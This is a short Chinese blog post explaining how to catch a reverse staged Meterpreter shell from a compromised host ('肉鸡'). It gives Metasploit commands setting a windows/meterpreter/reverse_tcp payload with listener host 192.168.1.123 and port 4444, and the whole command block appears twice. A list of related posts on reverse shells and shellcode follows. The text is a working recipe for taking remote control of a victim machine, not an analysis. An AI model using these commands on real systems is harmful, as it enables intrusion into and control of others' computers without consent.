反弹stage shellcode到meterpreter
2015-05-12 23:17
417 查看
1.在肉鸡上运行stage1的shellcode
2.在kali上运行metsploit framework
3.执行下面的命令
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.123
LHOST => 192.168.1.123
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
2.在kali上运行metsploit framework
3.执行下面的命令
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.123
LHOST => 192.168.1.123
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
相关文章推荐
- Metasploit生成Stage shellcode
- 如何生成stage shellcode
- bind stage shellcode ,reverse stage shellcode,reverse shellcode的异同
- org.apache.hadoop.util.Shell$ExitCodeException
- shell-code-3-echo用法&printf用法
- shell-code-5-函数
- 浅入浅出Liunx Shellcode
- windows shellcode 总结
- linux下反弹shell的几种方法
- 反弹先锋Win32.ConnectBackShell
- reverse shellcode调试问题问答
- myShellcode
- bash反弹shell
- cpcode 的shell
- 浅析重定向与反弹Shell命令
- 第一章:The Missing Code Library--12.建立一个Shell脚本库
- KTHREAD 线程调度 SDT TEB SEH shellcode中DLL模块机制动态获取 《寒江独钓》内核学习笔记(5)
- 各种反弹shell的方式
- 反弹shell
- Allwin WinExec add new local administrator + ExitProcess Shellcode